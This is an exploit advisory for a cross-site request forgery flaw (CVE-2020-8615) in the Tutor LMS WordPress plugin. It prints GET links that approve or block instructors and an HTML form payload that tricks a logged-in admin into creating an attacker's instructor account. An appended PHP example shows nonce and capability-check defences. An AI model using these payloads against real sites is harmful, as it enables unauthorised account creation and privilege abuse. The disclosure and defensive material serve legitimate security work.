Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)

Exploit author: Jinson Varghese Behanan
Exploit platform: php
Exploit published date: 2020-03-02

# Exploit Title: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User)
# Date: 2020-01-30
# Vendor Homepage: https://www.themeum.com/product/tutor-lms/
# Vendor Changelog: https://wordpress.org/plugins/tutor/#developers
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 1.5.2 and below
# CVE : CVE-2020-8615

# 1. Description

# The Tutor LMS WordPress plugin is a feature-packed plugin that enables users to create and sell courses.
# An attacker can use CSRF to register themselves as an instructor or to block other legitimate instructors.
# Consequently, if the option to create courses without admin approval is enabled on the plugin's settings
# page, the attacker will be able to create courses directly as well. All WordPress websites
# using Tutor LMS version 1.5.2 and below are affected.

# 2. Proof of Concept

# As the requests for the approval and blocking of instructors are sent using the GET method, the CSRF 
# attack to approve an attacker-controlled instructor account can be performed by having the admin 
# visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=approve&instructor=8 directly, 
# after retrieving the instructor ID during the registration process. An approved instructor can also be blocked 
# by directing the admin to visit https://TARGET/wp-admin/admin.php?page=tutor-instructors&action=blocked&instructor=7.

# A CSRF attack can also be performed on the form present at https://TARGET/wp-admin/admin.php?page=tutor-instructors&sub_page=add_new_instructor
# in order to have the admin add an instructor account for the attacker, thus bypassing the requirement for approval.
# This can be done by tricking the admin into submitting the web form given below as a POST request. For example, if the web form is
# hosted on an attacker-controlled domain https://attacker.com/csrf.html, an admin who is logged in at https://TARGET can
# be tricked into visiting the link and triggering the request to add an instructor.

<html>
	<body>
		<script>history.pushState('', '', '/')</script>
		<form action="https://TARGET/wp-admin/admin-ajax.php" method="POST">
			<input type="hidden" name="action" value="add&#95;new&#95;instructor" />
			<input type="hidden" name="first&#95;name" value="John" />
			<input type="hidden" name="last&#95;name" value="Doe" />
			<input type="hidden" name="user&#95;login" value="jd_instructor" />
			<input type="hidden" name="email" value="jd@TARGET" />
			<input type="hidden" name="phone&#95;number" value="1231231231" />
			<input type="hidden" name="password" value="Pa&#36;&#36;w0rd&#33;" /> 
			<input type="hidden" name="password&#95;confirmation" value="Pa&#36;&#36;w0rd&#33;" />
			<input type="hidden" name="tutor&#95;profile&#95;bio" value="Et&#32;tempore&#32;culpa&#32;n" />
			<input type="hidden" name="action" value="tutor&#95;add&#95;instructor" /> 
			<input type="submit" value="Submit request" />
		</form> 
	</body>
</html>

# 3. Timeline

# Vulnerability reported to the Tutor LMS team on January 30, 2020.
# Tutor LMS version 1.5.3 containing the fix released on February 4, 2020.
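Added example, not code from Tutor LMS or from the advisory author: the two handlers the advisory describes (the GET approve/block action and the admin-ajax add-instructor POST), protected the way WordPress expects, with a nonce bound to the action and a capability check, so that neither the bare GET URL nor a form posted from another origin changes state. Function names and the `example_instructor_status` user-meta key are hypothetical; the WordPress APIs used are real.

```php
<?php
// Added illustration, not Tutor LMS code: nonce + capability checks for an
// admin GET action and an admin-ajax POST handler. Function names and the
// 'example_instructor_status' meta key are hypothetical; WP APIs are real.

// Render approve/block links with a nonce tied to action + instructor ID,
// so the bare URL alone (as in the advisory) no longer triggers the change.
function example_instructor_action_url( $action, $instructor_id ) {
    $id  = absint( $instructor_id );
    $url = admin_url( "admin.php?page=tutor-instructors&action={$action}&instructor={$id}" );
    return wp_nonce_url( $url, "example_instructor_{$action}_{$id}" ); // adds _wpnonce
}

// GET handler: verify the nonce first (it fails for a forged cross-site
// request), then require the capability, only then change state.
function example_handle_instructor_action() {
    if ( 'tutor-instructors' !== ( $_GET['page'] ?? '' ) ) {
        return;
    }
    $action = sanitize_key( wp_unslash( $_GET['action'] ?? '' ) );
    $id     = absint( $_GET['instructor'] ?? 0 );
    if ( ! $id || ! in_array( $action, array( 'approve', 'blocked' ), true ) ) {
        return;
    }
    check_admin_referer( "example_instructor_{$action}_{$id}" ); // wp_die()s on bad/missing nonce
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', 403 );
    }
    update_user_meta( $id, 'example_instructor_status', 'approve' === $action ? 'approved' : 'blocked' );
}
add_action( 'admin_init', 'example_handle_instructor_action' );

// POST handler for admin-ajax.php?action=tutor_add_instructor. The legitimate
// form must emit wp_nonce_field( 'example_add_instructor', '_example_nonce' ).
function example_ajax_add_instructor() {
    check_ajax_referer( 'example_add_instructor', '_example_nonce' ); // dies with -1 on failure
    if ( ! current_user_can( 'create_users' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $user_id = wp_insert_user( array(
        'user_login' => sanitize_user( wp_unslash( $_POST['user_login'] ?? '' ) ),
        'user_email' => sanitize_email( wp_unslash( $_POST['email'] ?? '' ) ),
        'user_pass'  => (string) wp_unslash( $_POST['password'] ?? '' ),
        'role'       => 'subscriber',
    ) );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( $user_id->get_error_message(), 400 );
    }
    update_user_meta( $user_id, 'example_instructor_status', 'approved' );
    wp_send_json_success( array( 'user_id' => $user_id ) );
}
add_action( 'wp_ajax_tutor_add_instructor', 'example_ajax_add_instructor' );
```

Because the nonce is derived from the logged-in user's session and the specific action, the attacker's page cannot obtain or guess it, which is what defeats both the GET link and the cross-origin form shown above.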